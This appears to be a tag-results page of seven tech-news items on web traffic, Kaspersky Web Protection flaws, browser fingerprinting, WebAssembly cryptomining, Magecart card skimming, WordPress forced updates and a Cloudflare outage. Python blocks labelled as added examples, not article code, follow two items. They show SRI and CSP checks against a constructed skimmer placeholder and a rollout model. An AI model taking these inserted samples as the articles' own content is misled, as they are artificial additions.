Showing results for tags 'websites'.



Found 20 results

  1. If there were any major sites that took a web traffic pummeling in 2019 it was Yahoo and Tumblr. That’s according to a new report from SimilarWeb. The report looks back on key web trends in 2019. Among those trends was some pretty bad news for some sites. Particularly, SimilarWeb’s report says Tumblr saw its web traffic plummet 33% since 2018, when the site banned adult content. Yahoo saw a similar drop from its 2017 numbers, falling 33.6% during the period.

     Other key findings from the report:

     Total web traffic is on the rise, growing 8% in 2019 to 223 billion visits per month to the top 100 websites worldwide. Mobile is fueling much of that growth. While desktop web traffic decreased 3.3% since 2017, mobile web traffic shot up 30.6% over the same period. But with the mobile web comes shrinking attention spans. The report says that visitors are spending 49 seconds less on websites per visit than they did three years ago.

     The top 10 sites took 167.5 billion visits per month in 2019, a 10.7% increase. Mobile visits claim the majority of visits made to “vice” sites, those that involve porn and gambling. The U.S. leads the world when it comes to visiting the websites. In 2019, over 300 billion visits per month to sites were made from America.

     The takeaway? Mobile is quickly becoming the new norm, but websites are going to have to work harder to keep visitor attention as our attention spans continue to shrink.

     Source
  2. Updated: The internal API has been subject to not one, but multiple failed fix attempts.

     Vulnerabilities in Kaspersky software have left an internal API open to abuse by webmasters and attempts to patch have, so far, failed. On Monday, software developer Wladimir Palant documented the saga, which began after he began investigating Kaspersky Web Protection features included in software such as Kaspersky Internet Security 2019. The online protection functionality includes scans of search results to weed out potentially malicious links, ad blocking, and tracking prevention.

     In December last year, the developer found a set of vulnerabilities and security issues in the Web Protection feature, which can be enabled by any website. Web Protection needs to be able to communicate with the main Kaspersky application and a "secret" signature value, which in theory is not known to web domains, is enabled to ensure secure communication. However, a security flaw permitted websites to elicit this key "fairly easily," according to Palant, and "allow them to establish a connection to the Kaspersky application and send commands just like Web Protection would do."

     Chrome and Firefox extensions use native messaging to retrieve the signature, whereas Internet Explorer reads script injections. Without a browser extension, Kaspersky will inject its scripts directly into web pages, and this is where the first vulnerability of note, CVE-2019-15685, appeared through the abuse of URL Advisor and frames in order to extract the signature. "Websites could use this vulnerability, for example, to silently disable adblocking and tracking protection functionality," the developer says. "They could also do quite a few things where the impact wasn't quite as obvious."

     After the flaw was reported, Kaspersky developed a fix in July 2019 by blocking access to some functionality to websites in 2020 products. However, other commands could still be accepted, such as whitelisting websites on adblockers (CVE-2019-15686). A new issue also emerged due to the failed patch; websites were able to access user system data, including unique identifiers of the Kaspersky installation on a PC (CVE-2019-15687).

     "When I tried the new Kaspersky Internet Security 2020, extracting the secret from injected scripts was still trivial and the main challenge was adapting my proof-of-concept code to changes in the API calling convention," Palant says. "Frankly, I cannot blame Kaspersky developers for not even trying -- I think that defending their scripts in an environment that they cannot control is a lost cause."

     This inadvertently-introduced data leak was not the end of the story. Palant says that the patch also introduced a new vulnerability that could be used to trigger a crash in the antivirus process, leaving systems vulnerable to compromise, tracked as CVE-2019-15686. The cybersecurity firm then attempted another fix, resolving the data leak and "mostly" fixing the crash issue; websites no longer could trigger a crash, but browser extensions or local applications possibly could.

     A new patch has been developed and will be made available on November 28, but given a fallback script injection approach rather than relying purely on browser extensions, the developer isn't hopeful when it comes to the true resolution of the problem. "Maybe Kaspersky is so attached to scripts injected directly into web pages because these are considered a distinguishing feature of their product, it being able to do its job even if users decline to install extensions," the developer says. "But that feature also happens to be a security hazard and doesn't appear to be reparable."

     "One thing won't change, however: websites can still send commands to Kaspersky applications. Is all the functionality they can trigger there harmless? I wouldn't bet on it."

     Update 14.14 GMT: A Kaspersky spokesperson told ZDNet: "Kaspersky has fixed security issues in the web protection component in its products and product extensions for Google Chrome. These security issues were fixed by patches 2019 I, J and 2020 E, F, which were delivered to users through the automatic update procedures. A reboot may be required to apply these updates. The company also recommends that users make sure that Kaspersky protection extensions for web browsers are installed and enabled. Detailed information about the fixed issues is available on the Kaspersky website."

     Source
  3. Just when you thought we had hit rock bottom on all the ways the internet could snoop on us - no. We've sunk even lower.

     There's a tactic spreading across the web named after treatment usually reserved for criminals: fingerprinting. At least a third of the 500 sites Americans visit most often use hidden code to run an identity check on your computer or phone. Websites from CNN and Best Buy to porn site Xvideos and WebMD are dusting your digital fingerprints by collecting details about your device you can't easily hide. It doesn't matter whether you turn on "private browsing" mode, clear tracker cookies or use a virtual private network. Some even use the fact you've flagged "do not track" in your browser as a way to fingerprint you.

     They're doing it, I suspect, because more of us are taking steps to protect our data. Privacy is an arms race - and we are falling behind.

     Fingerprinting happens when sites force your browser to hand over innocent-looking but largely unchanging technical information about your computer, such as the resolution of your screen, your operating system or the fonts you have installed. Combined, those details create a picture of your device as unique as the skin on your thumb. Sites can use your digital fingerprint to know if you've visited before, create profiles of your behavior or make ads follow you around. They can also use it to stop you from sharing a password, identify fraudsters and block harmful bots. Fingerprinting has been around for more than a decade but considered mostly a theoretical threat for you and me. Not any more.

     I asked Patrick Jackson, chief technology officer of privacy software company Disconnect, to test for signs of fingerprinting on the 500 most popular websites used by Americans. He revealed what these sites hide in their code and do on our computers that we don't get to see on our screens. I'm naming names.

     Of the 183 likely fingerprinters Jackson identified between September 30 and October 8, I asked 30 of the most well-known to explain their behaviour. (See below for a list.) Some claimed it was industry-standard to fingerprint. Many said they didn't realise it was happening or never collected our data themselves, because they had let ad and data partners operate parts of their websites. After hearing from me, six sites said they would remove fingerprinting code, including four run by the US government.

     It's happening on sites you wouldn't think would be so intrusive, including Thesaurus.com and AllRecipes.com - even security and privacy software maker Norton.com. Two porn sites didn't answer my questions, but Jackson suspects they're using it to track and tailor content to the people who view them in private-browsing modes that turn out to be not so private.

     The Washington Post website fingerprints visitors when they've blocked cookies, which ought to be a signal visitors don't want to be tracked. In different ways, the Fox News and New York Times websites do it, too.

     Fingerprinting isn't yet as widespread as cookies, those tiny files websites drop in your browser to track you. But it's concerning because it's much, much more aggressive.

     "Fingerprinting is designed to be user-hostile," said Jackson. "It even takes the fact that you don't want to be tracked as a parameter to make your fingerprint more unique."

     Google, Apple and Mozilla, which make the world's most-used browsers, rarely agree on much, but they've all identified fingerprinting as a growing threat. "Because fingerprinting is neither transparent nor under the user's control, it results in tracking that doesn't respect user choice," wrote Google's Chrome browser engineers in May.

     What's at stake is a pretty fundamental attribute of the web: anonymity. One of the original benefits of the internet is that anyone can express themselves and access information without fear. But to update an adage: Now on the internet, they definitely know you're a dog.

     Why are some of the most well-known websites doing this? And what can we do to stop it? It's another tale of the tech industry putting its own concerns ahead of your privacy.

     How they fingerprint you

     Fingerprinting sites don't necessarily know you by name. But they're connecting the dots on information that could be just as valuable.

     When you load a site, fingerprinting code starts asking your computer for things that aren't part of the usual process of drawing a page. Knowing what operating system you're running, what fonts you have installed or what your address is on your internal network makes you look different from other people visiting the site. Some sites use as a signal whether people have turned on the "Do not track" flag in their browser. (That's not ironic; it's malicious.)

     Many times, fingerprinting code will run the digital equivalent of a sonar test, sending out a signal just to see what comes back. Website code instructs your browser how to draw out text. The coding in it for fingerprinting can include words or icons that never show up on your screen, letting websites track minute differences in how each device responds. The Best Buy website used this invisible ink to write "F1n63r,Pr1n71n6!" - stand back and you might see it spells out "fingerprinting!"

     Every site draws on different data points to build your fingerprint, which is part of what makes it so hard to stop. In his tests, which weren't definitive, Jackson just flagged the most suspicious behaviour. Apps can fingerprint, too, using even more attributes available on phones and tablets.

     Engineer Valentin Vasilyev helped take fingerprinting beyond academic research with free software called Fingerprint2.js. We found traces of it used on many websites. A demonstration on his site, which claims it has "99.5 percent identification accuracy," correctly spotted my browser a half-dozen times over a week. Vasilyev told me fingerprinting just connects the dots on information browsers already make public - and he can't be held responsible for how people use it. "By creating this product, I just showed everyone including browser vendors and researchers how it can be done," he said. A "pro" version he sells "is mostly companies trying to protect themselves" from issues such as fraud, he said.

     A digital strip search

     It's true that not all fingerprinting is used for devious purposes. But it is the digital equivalent of airport security conducting strip searches of everyone. More effective? Perhaps. Good? No.

     Chase, Wells Fargo, Airbnb, Best Buy, eBay and Marriott told me fingerprinting lets them bolster security, such as fighting attempts to use stolen credit cards or passwords. (A device looks suspicious if it attempts to try many different card numbers or logins.) Textbook firm Cengage said it was stopping piracy and tailoring content.

     The New York Times and Fox News said fingerprinting was helping identify automated bots that might interfere with site operation. "We don't use fingerprinting to track our readers and have internal rules forbidding it," said Times spokeswoman Danielle Rhoades Ha. "The simple act of producing a fingerprint is not aggressive; using it to target a user would be."

     We discovered four federal agencies - the Internal Revenue Service, State Department, Citizenship and Immigration Services, and National Weather Service - had fingerprinting code as part of a customer satisfaction survey, to keep from repeatedly asking people to fill out the questionnaire. After I reached out, they all said they would update their software to remove it. (The vendor that provides that software, Verint, said the code was added as part of a test and was "unutilized.")

     Marketing appeared to be the largest use for fingerprinting among the sites Jackson identified. Sites including Reddit and Thesaurus.com said it helps protect advertisers against fraud and sensitive content - all the while allowing a firm called DoubleVerify to probe details about the computers of millions of people. (The company didn't answer my questions about how it uses data, how long it holds onto it or how it protects it.)

     Payroll firm ADP uses fingerprinting scripts from at least two ad-tech firms to support its marketing. "The data collected during this standard practice is anonymous, non-identifiable and aggregated," said spokeswoman Allyce Hackmann.

     Some claim the tech is anonymous because it identifies computers and phones rather than people's names. Washington Post spokeswoman Molly Gannon said, "The Post is using industry-standard advertising systems to support our ad business and serve our users relevant ads."

     Just because fingerprinting is becoming common doesn't make it right. Most sites don't expressly state they're fingerprinting in privacy policies, much less make it clear how they and their partners might use and share the data.

     What's the big worry? It's hard to know how this snooping might be used to harm or exploit us. "Data collected today can be used against us today, tomorrow or even 10 years from now," says Jackson, who used to work for the National Security Agency. "Your browsing history, the apps you use and the data you give companies can lead to voter manipulation, targeted behavior modification, and further aids the mass surveillance of our activities on and offline."

     At least a few sites understood fingerprinting was an ethical issue. After I contacted it, AccuWeather told its ad firms to cut it out. So did Comcast, one of the country's largest media companies. When I reported we found its Xfinity.com site fingerprinting users, Comcast removed the code - and made the ad firm that had been collecting the data confirm it didn't store or share any of it. "We don't use fingerprinting trackers on our website, and we don't permit our business partners and service providers to do so," said Comcast spokeswoman Jennifer Khoury. "We'll be performing regular site scans to prevent this from happening and are putting in place additional review systems for our partners."

     How to fight back

     Fingerprinting isn't like other online snooping. We can't entirely stop it by blocking cookies or making other simple changes to our browsers. The tactics keep evolving.

     The good news is that there are gradations of certainty in fingerprinting - not all devices and browsers are equally easy to detect. Vasilyev, who created fingerprinting software, said it is still possible to make yourself hard to fingerprint by using software such as Tor. It's a privacy-first browser that goes to great lengths to make each user's device look the same - but only useful for highly technical people because it breaks common websites.

     You can also get some protection from more consumer-friendly software. Apple iPhones, iPads and Macs running the company's Safari browser are among the hardest to fingerprint. That is, in part, because Apple has a relatively limited product line and those devices tend to be standardized - so they look more similar to fingerprinting software (compared to the zillions of variations in Android phones and Windows laptops out there). It's a kind of online herd immunity.

     Apple's Safari also has been tackling fingerprinting directly by reducing the amount of information it shares, such as a list of built-in fonts (instead of custom ones). Safari also asks you for permission before handing over information about your device orientation and motion, two more potential data points for fingerprinters. You don't have to adjust any settings to turn these protections on - they're the default.

     However, most people in the world do not own Apple devices. Everyone else should consider the Firefox browser, which I've recommended before because of its aggressive default protection from tracker cookies. It's in the final stages of adding some default fingerprinting protections, too, based around blocking traffic from known fingerprinting addresses - which, it acknowledges, fixes only part of the problem. You can turn on an early version of these protections now by going to the "Custom" tab under privacy and security settings.

     Google's Chrome browser currently doesn't do much to stop fingerprinting by default. You can add browser privacy extensions such as uBlock Origin, the Electronic Frontier Foundation's Privacy Badger or Jackson's Disconnect to help stop some fingerprinting. But beware this software might break some of the sites you want to visit.

     In May, Google promised it was going to join the fingerprinting fight - an important move because Chrome is by far the most-used browser. It says its plans include reducing the way browsers can be "passively" fingerprinted, so that it can detect and intervene against "active" fingerprinting efforts as they happen. When these changes arrive on Chrome in the first half of 2020, they should make a difference. That is, until it's time for the next round of battle against the snoops.

     FINGERPRINTERS:
       • Accuweather.com*
       • Adobe.com
       • Adp.com
       • Airbnb.com
       • Allrecipes.com
       • Bestbuy.com
       • Cengage.com
       • Chase.com
       • Cnn.com
       • Costco.com
       • Ebay.com
       • State.gov*
       • Foxnews.com
       • Hotels.com
       • Imdb.com
       • Irs.gov*
       • Marriott.com
       • Norton.com
       • Nytimes.com
       • Reddit.com
       • Thesaurus.com
       • Uscis.gov*
       • Washingtonpost.com
       • Weather.gov*
       • Wellsfargo.com
       • Xfinity.com*
       • Xvideos.com
       • Yahoo.com
     (* = said it would stop)

     Paywall Source / Free Source
  4. A study published in June 2019 reveals that in the Alexa Top 1 million websites, one out of 600 sites executes WebAssembly (Wasm) code. The study moreover finds that over 50% of those sites using WebAssembly apply it for malicious deeds, such as cryptocurrency mining and malware code obfuscation.

     Marius Musch, Christian Wressnegger, Martin Johns, and Konrad Rieck, in a study sponsored by the Institute for Application Security and the Institute of System Security from the Technische Universität Braunschweig, analyzed the prevalence of WebAssembly in the Alexa Top 1 million websites. The team examined the websites in the Alexa sample over a time span of four days, and successfully studied 947,704 websites, eventually visiting 3,465,320 web pages. The study provides novel information about the prevalence of WebAssembly, the extent of its usage by the websites featuring Wasm modules, and categorizes WebAssembly usage purpose by those sites.

     1,950 Wasm modules were found on 1,639 sites (roughly one site out of 600). An important portion of these modules is not loaded on the front page of a site, but on subpages, often through a third-party script or iframe with another origin (795 sites from the sample). The study reports that the 1,950 Wasm modules represent 150 unique samples, indicating that some Wasm modules are found on several sites, with the extreme case of one module being present on 346 different sites. Conversely, 87 samples are unique to a website, indicating a custom development for that particular website. On average, sites using WebAssembly use 1.2 Wasm modules per page visited by the study. Ranking-wise, sites with a lower Alexa rank, i.e. higher user traffic (google.com for instance ranks first) tend to use WebAssembly more often.

     The study also provided data about the extent of usage of WebAssembly in relevant websites, using two indicators to that purpose. The first is the size of the WebAssembly module, ranging from 8 bytes to 25.3MB, with a median value of 100KB per module. This can be explained by the difference in WebAssembly usage purpose. The study reports that some sites just test if the browser does support WebAssembly, while other sites are actually relying on the functionality the module exposes. The second indicator, WebAssembly relative usage vs. JavaScript as extracted by the Chrome browser's integrated performance profiler, shows two clear segments. On the one hand, a majority of sites (1121 sites or roughly two-thirds of the sample) almost never use WebAssembly. On the other hand, the rest of the sites are nearly exclusively spending time running the Wasm code.

     The research team manually categorized the Wasm modules in 6 categories, reflecting the purpose behind the use of WebAssembly: Custom, Game, Library, Mining, Obfuscation, and Test. Of these six categories, two (Mining – 55.6% of website sample, and Obfuscation – 0.2% of website sample) represent malicious usage of WebAssembly. The study details:

     The largest observed category implements a cryptocurrency miner in WebAssembly, for which we found 48 unique samples on 913 sites in the Alexa Top 1 Million. (…) 56%, the majority of all WebAssembly usage in the Alexa Top 1 Million is for malicious purposes.

     Wasm samples in the Mining category exhibit unique traits vs. modules from other categories. The collected WebAssembly miners' code share a high similarity. Furthermore, profiling data indicates that the vast majority of websites with intense usage of Wasm (more than 50% of the time spent running WebAssembly code) are indeed mining for cryptocurrencies. A manual analysis of the modules in the Mining category, and which did not display intense Wasm code usage (relative CPU share below 50%) indicates four key reasons for the failure to run Wasm code:

       • A mining script is included, but the miner is not started or was disabled and the script not removed.
       • The miner only starts once the user interacts with the web page or after a certain delay.
       • The miner is broken, either because of invalid modifications or because the remote API has changed.
       • The WebSocket backend is not responding, which prevents the miner from running.

     The study concludes:

     [The study] suggests that we are currently only seeing the tip of the iceberg of a new generation of malware (…). In consequence, incorporating the analysis of WebAssembly code hence is going to be of essence for effective future defense mechanisms.

     The full study is available online. A shorter presentation summarizing the results of the study can also be consulted.

     The data collection methodology defines a site as one entry in the Alexa list, together with the pages that share the same origin with that entry. The research team instrumented a browser to collect all WebAssembly code. As a preliminary study revealed that a significant fraction of the Wasm code is not loaded when visiting the front page of a domain, the study collected data from three randomly selected links from the front page. This led to identifying 25% more sites that use WebAssembly and to collecting 40% more unique samples, compared to a crawl of the same sites without any subpages. The research team additionally used a profiler to gather information about the CPU usage of the visited sites, allowing the team to assess the percentage of time spent executing JavaScript and WebAssembly code. For profiling purposes, the research team measured the execution time of Wasm and JavaScript code and excluded all other factors like idle times when waiting for network responses. At a technical level, the research team transparently hooked the creation of all JavaScript functions which can compile or instantiate Wasm modules. This includes the instantiate method, the instantiateStreaming method, the WebAssembly.Module constructor and more.

     Alexa provides website traffic statistics, among which a website traffic ranking. The rank is calculated using a proprietary methodology that combines a site’s estimated average of daily unique visitors and its estimated number of pageviews over the past three months.

     The Technische Universität Braunschweig (Braunschweig Institute of Technology) is the oldest Technische Universität (comparable to an institute of technology in the American system) in Germany and ranks among the top universities for engineering in Germany.

     Source
  5. With over two million detections to date, compromising shopping sites' resources to steal customer payment card info is a global phenomenon unlikely to end soon. These attacks are collectively known as Magecart and there are multiple groups currently in the business, some more advanced than others. They target online payment forms and steal card data at checkout, a cybercriminal activity known as web skimming. This is done by loading at checkout JavaScript code designed to copy payment data and to send it to the attackers' server. Getting the code on the checkout page is possible by breaching the website directly or by compromising a web resource from a third party that is loaded on the page, such as an analytics script or a customer support widget. Millions of Magecart instances detected In a report released today, RiskIQ notes that the first Magecart threat they observed was on August 8, 2010. The phenomenon did not take off until last year, though, when British Airways, Ticketmaster, OXO, and Newegg were hit. Since then, multiple attackers emerged creating dozens of card info skimming scripts and infecting thousands of websites. In one automated attack alone, over 960 stores were compromised. RiskIQ estimates that the Magecart threat may have impacted millions of users. Their telemetry data shows a total of 2,086,529 instances of Magecart detections. According to the company, supply-chain attacks account for the highest spikes in Magecart detections. "Suppliers can include vendors that integrate with sites to add or improve site functionality or cloud resources from which websites pull code, such as Amazon S3 Buckets. These third-parties integrate with thousands of websites" - RiskIQ Out of all Magecart groups tracked by security researchers, Group 5 is the most prolific and advanced. They focus on third-party suppliers, like website analytics providers SociaPlus and Inbenta, and skim payment details from hundreds of websites. 
Unsecured or misconfigured Amazon S3 buckets are also among the targets, as they often store resources used by a large number of domains. One actor set its sights on them and automated the discovery and compromise process to impact more than 17,000 domains. Since the beginning of the campaign in early April this year, RiskIQ monitored the compromise of S3 buckets and recorded worrying statistics: over 18,000 hosts with Magecart AWS injects.

Attackers monitor security developments

Many of the Magecart groups that RiskIQ tracks still focus on the Magento shopping platform, which was the main target when these attacks started to multiply. OpenCart is also of particular interest to the attackers. Attackers keep a close eye on the development of these shopping cart platforms, and vulnerabilities discovered in one of them are normally followed by a spike in the number of victims. The trend reverses when a patch is released and admins start applying it. The graph below shows how the number of victims fluctuates according to Magento security developments.

Taking any opportunity

While the details above clearly show how prevalent Magecart is, they do not tell the full story of the phenomenon, as the threat actors are constantly looking for new ways to distribute their web skimming scripts. RiskIQ observed a new set of targets as "Magecart groups are also compromising creative ad script tags to leverage digital ad networks to generate traffic to their skimmers on thousands of sites at once." Of all malicious advertisements, the company discovered that 17% distribute the Magecart threat.

As for the average lifetime of a breach, the code survives on average for 22 days. The reason is that many victims are unaware that their website loads malicious JavaScript. New Magecart actors are likely to appear since Magecart has spread so widely that its infrastructure is a common occurrence.

Much of it is managed by responsible security parties making sure that traffic from the victims does not reach the bad guys. This is done by taking over the malicious domains used to serve the web-skimming code and/or receive the card information. The bad news is that many of these domains end up being released to the public pool as the registrar takes them offline or puts them on hold. Since many Magecart scripts continue to be active on victim websites, malicious actors buy the released domains and resume their activity.

As if all this was not enough, researchers from IBM X-Force Incident Response and Intelligence Services (IRIS) published last week a report about Magecart Group 5 testing card-stealing scripts that are injected into websites through commercial routers providing WiFi in public spaces like airports, hotels, casinos or resorts. One of the scripts, 'test4.html', has code to interact with commercial-grade Layer 7 routers that can provide WiFi connectivity after passing through a captive portal that sets some conditions, like paying for the service or viewing ads. Another script indicates that the actor aims at infecting Swiper, an open-source JavaScript library used by about 300,000 to make websites built for desktop viewing compatible with mobile devices.

Add some safety measures

Putting an end to these incidents may not be a realistic endeavor for the moment, but there are ways to reduce their frequency. Merchants can enable checks on third-party resources through a Content Security Policy (CSP), which restricts JavaScript loading to a trusted list of domains and blocks the attackers' domain. Another option is Subresource Integrity (SRI), which prevents loading modified JavaScript code by checking a cryptographic hash of the legitimate resource.

Consumers have few options to stay safe against Magecart. Using browser plugins that block loading of JavaScript helps in the case of untrusted websites, but it is of no use with those already whitelisted. A more technical approach, which has obvious shortcomings for the average user, is to block connections to domains and IP addresses used by the attackers.

Source
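The two merchant-side mitigations named above, SRI pinning and a CSP allowlist, worked through as an added Python example; this is not the article's or RiskIQ's code, and the script bodies, hostnames and policy values are constructed for illustration:

```python
"""Added example, not code from the article or RiskIQ: the two merchant-side
mitigations named above, Subresource Integrity (SRI) and a Content Security
Policy (CSP) allowlist, applied to a checkout page's third-party script.
The script bodies and hostnames are constructed sample data."""
import base64
import hashlib

# Constructed sample: the reviewed, legitimate copy of a third-party script.
LEGIT_SCRIPT = b"window.checkout = function () { /* legitimate code */ };\n"
# Constructed sample: the same file after a skimmer was appended to it.
SKIMMED_SCRIPT = LEGIT_SCRIPT + b"/* injected skimmer */ harvestCardForm();\n"

# SRI allows exactly these digest algorithms; a browser honours only the
# strongest one present in an integrity attribute.
STRENGTH = {"sha256": 1, "sha384": 2, "sha512": 3}


def sri_hash(body: bytes, algo: str = "sha384") -> str:
    """Return the SRI integrity value ("sha384-<base64 digest>") for body."""
    if algo not in STRENGTH:
        raise ValueError("SRI permits only sha256, sha384 or sha512")
    digest = hashlib.new(algo, body).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def verify_sri(body: bytes, integrity: str) -> bool:
    """Check body against an integrity attribute the way a browser does:
    only hashes of the strongest listed algorithm count, and the body passes
    if it matches any of them. A browser given no parseable metadata loads
    the resource unchecked; this build-time checker fails closed instead."""
    candidates = []
    for token in integrity.split():
        algo, _, digest = token.partition("-")
        if algo in STRENGTH and digest:
            candidates.append((STRENGTH[algo], algo, digest))
    if not candidates:
        return False
    best = max(strength for strength, _, _ in candidates)
    return any(sri_hash(body, algo) == f"{algo}-{digest}"
               for strength, algo, digest in candidates if strength == best)


def script_tag(src: str, body: bytes) -> str:
    """Emit the <script> element for a third-party resource pinned to the
    reviewed copy. crossorigin="anonymous" is required for SRI to apply to a
    cross-origin script; if the host later serves a modified file (as in the
    S3 bucket compromises above) the browser refuses to run it."""
    return (f'<script src="{src}" integrity="{sri_hash(body)}" '
            'crossorigin="anonymous"></script>')


def csp_header(script_hosts, connect_hosts=()):
    """Build a Content-Security-Policy value that only allows scripts from
    the page's own origin and the listed hosts. connect-src is restricted as
    well because a skimmer has to send the card data somewhere; img-src and
    form-action deserve the same treatment, since skimmers also exfiltrate
    via image requests and form posts."""
    script_src = " ".join(["'self'", *script_hosts])
    connect_src = " ".join(["'self'", *connect_hosts])
    return (f"script-src {script_src}; connect-src {connect_src}; "
            "object-src 'none'; base-uri 'self'")


if __name__ == "__main__":
    print(script_tag("https://cdn.example.test/checkout.js", LEGIT_SCRIPT))
    print("Content-Security-Policy:",
          csp_header(["https://cdn.example.test"],
                     ["https://api.psp.example.test"]))
    pinned = sri_hash(LEGIT_SCRIPT)
    print("legit passes:", verify_sri(LEGIT_SCRIPT, pinned))      # True
    print("skimmed passes:", verify_sri(SKIMMED_SCRIPT, pinned))  # False
```

The integrity value is computed once from the reviewed copy at build time; anything the CDN or bucket serves later that does not hash to it is blocked by the browser.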
  6. WordPress team wants to forcibly auto-update older WordPress versions to newer releases.

The developers behind the WordPress open-source content management system (CMS) are working on a plan to forcibly auto-update older versions of the CMS to more recent releases. The goal of this plan is to improve the security of the WordPress ecosystem, and the internet as a whole, since WordPress installations account for more than 34% of all internet websites.

Officially supported versions include only the last six WordPress major releases, which currently are all the versions between v4.7 and v5.2. The plan is to slowly auto-update old WordPress sites, starting with v3.7, to the current minimum supported version, which is the v4.7 release. This will be done in multiple stages, as follows:

2% of all WP 3.7 sites will be auto-updated to WP 3.8.
After a week, another 18% will be auto-updated to WP 3.8.
After two weeks, 80% of WP 3.7 sites will be auto-updated to WP 3.8.
Repeat the same steps as above, but migrating sites from WP 3.8 to WP 3.9; WP 3.9 to WP 4.0; and so on.

The WordPress team said it plans to monitor this tiered forced auto-update process for errors and site breakage. If there's something massively wrong, then the auto-update can be stopped altogether. If only a few individual sites break, then those sites will be rolled back to their previous versions and the owners will be notified via email.

"The email should be a strongly-worded warning, letting them know that their site could not be upgraded to a secure version, and that they should manually update immediately. If they don't update, it's almost guaranteed that their site will be hacked eventually," said Ian Dunn, a member of the WordPress dev team.

A first auto-update plan would have wreaked havoc on the internet

This looks like a sensible solution, but an earlier proposal had the WordPress team forcibly update all old WordPress sites to version 4.7 at once. This idea was quickly scrapped after an avalanche of negative feedback from WordPress site owners, who warned that millions of sites would have gone down with WSOD (white screen of death) errors caused by incompatibilities between themes, plugins and the newer WordPress core version. The tiered forced auto-update is the result of that feedback, and one that takes possible site breakage into account.

Furthermore, the WordPress team plans to allow site owners to opt out of this forced update process. The WordPress team plans to send emails to website administrators and show a stern warning in websites' dashboards before starting the auto-update process. These warnings will also include opt-out instructions, and will be shown/sent at least six weeks before a site is forcibly auto-updated. "They'll be warned about the security implications of opting-out," Dunn said.

More than 3% of the internet runs outdated WordPress sites

The finer details of the auto-update process have not been finalized yet, but a source has told ZDNet that the WordPress security team hopes to auto-update all old sites within a year. Versions prior to v3.7 will not be auto-updated because v3.7 is the version in which the auto-update mechanism was included in the CMS. These older versions only support manual updates and can't be auto-updated. Versions prior to v3.7 account for under 1% of all WordPress installations, though, so this won't be a big issue.

WordPress sites running versions from v3.7 to v4.7 account for 11.7% of all WordPress sites, which is roughly in the tens of millions of sites range. That's about 3% of all internet sites currently running extremely old WordPress versions. WordPress 3.7 was released on October 23, 2013, while the current minimum "safe" version, v4.7, was released in December 2016.

It was foreshadowed last year

While the plan to go with a forced update has shocked some members of the webdev community, it has not surprised ZDNet. We knew it was coming because the WordPress security team hinted about it last year. In a talk at the DerbyCon 2018 security conference, WordPress Security Team lead Aaron Campbell said his team was working on "wiping older versions from existence on the internet." This is what he meant.

The reason behind the WordPress dev team's desire to forcibly update all older CMS versions is manpower. For the past six years, WordPress developers have been backporting every single security patch to all versions going back to WordPress 3.7. While this was doable in the beginning, as the WordPress CMS moved forward it took up more and more time, because WordPress devs had to convert newer PHP code into code that's compatible with the older WordPress codebase.

"That sucks for us as a security team," Campbell said about this process, last year at DerbyCon. "But it's absolutely the best thing for our users. And because that's where we set the measure of success, that's what we do."

By moving all users to WordPress 4.7 (and then 4.8, 4.9, etc.), developers are making their own lives easier, but also keeping the internet as a whole more secure. WordPress is currently the most targeted CMS, mainly due to its large adoption and huge attack surface. Reducing the attack surface is the easiest way to combat malware botnets that take over WordPress sites and use them to host malware, SEO spam, or launch DDoS attacks.

Source
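The tiered schedule above, modelled as an added Python example so the cohort, halt and rollback behaviour can be seen together; this is not WordPress's code, and the halt threshold, the assumption that each version step runs for three weeks before the next begins, the site identifiers and the breakage oracle are all constructed:

```python
"""Added example, not WordPress's own code: a deterministic model of the
tiered rollout the article describes. Each version step moves 2% of the
sites still on the old version in week 0, a further 18% one week later and
the remaining 80% two weeks in, then the next step begins. The halt
threshold, the assumption that steps run back to back, and the site
identifiers and breakage oracle are all constructed for the example."""
import hashlib

VERSIONS = ["3.7", "3.8", "3.9", "4.0", "4.1", "4.2",
            "4.3", "4.4", "4.5", "4.6", "4.7"]
# (week offset within a step, cumulative percent of sites moved by then)
STAGES = [(0, 2), (1, 20), (2, 100)]
WEEKS_PER_STEP = 3  # assumption: one step finishes before the next starts


def stage_for(site_id: str, from_version: str) -> int:
    """Map a site to a stage (0, 1 or 2) with a hash of id and version, so
    the cohorts are stable across reruns but different sites act as the 2%
    canaries on each step."""
    h = hashlib.sha256(f"{site_id}:{from_version}".encode()).digest()
    bucket = int.from_bytes(h[:4], "big") % 100
    for stage, (_, cumulative) in enumerate(STAGES):
        if bucket < cumulative:
            return stage
    return len(STAGES) - 1


def planned_week(site_id: str, from_version: str) -> int:
    """Week, counted from the start of the whole plan, in which this site is
    scheduled to move from from_version to the next release."""
    step = VERSIONS.index(from_version)
    return step * WEEKS_PER_STEP + STAGES[stage_for(site_id, from_version)][0]


def run_plan(sites, breaks, halt_rate=0.10):
    """Walk every step and stage. breaks(site_id, target) is an oracle for
    'this site shows a WSOD on that version'. A cohort failing at or above
    halt_rate is treated as 'something massively wrong' and stops the whole
    plan; isolated failures are rolled back and the owner is notified.
    Returns (current versions, rolled-back (site, version) pairs, halt)."""
    current = {site: VERSIONS[0] for site in sites}
    rolled_back = []
    for step, target in enumerate(VERSIONS[1:]):
        source = VERSIONS[step]
        stages = {site: stage_for(site, source) for site in sites}
        for stage in range(len(STAGES)):
            cohort = [s for s in sites
                      if current[s] == source and stages[s] == stage]
            failed = {s for s in cohort if breaks(s, target)}
            if cohort and len(failed) / len(cohort) >= halt_rate:
                return current, rolled_back, (source, target, stage)
            for site in cohort:
                if site in failed:
                    # Stays on the old version; the owner gets the email.
                    rolled_back.append((site, target))
                else:
                    current[site] = target
    return current, rolled_back, None


if __name__ == "__main__":
    sample_sites = [f"site-{i:04d}" for i in range(5000)]  # constructed
    # Constructed oracle: one site runs a plugin that breaks on 3.8.
    final, rolled, halt = run_plan(
        sample_sites, lambda s, v: s == "site-0042" and v == "3.8")
    print(sum(v == "4.7" for v in final.values()), "sites on 4.7,",
          len(rolled), "rolled back, halted at", halt)
```

A site rolled back at one step is left behind by all later steps, which is exactly the "could not be upgraded, update manually" case the email in the article covers.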
  7. Cloudflare has gone down around the world and vast numbers of websites have gone down with it.

The company provides cloud computing services to millions of people, meaning that a lot of websites are not accessible. One of these is Down Detector, which tracks outages, meaning people can't even see if the website they want to visit is working or not. The chat service Discord has also stopped working, as well as a number of other prominent pages.

Matthew Prince, Cloudflare CEO, tweeted: ‘Aware of major @Cloudflare issues impacting us network wide. Team is working on getting to the bottom of what’s going on. Will continue to update.’

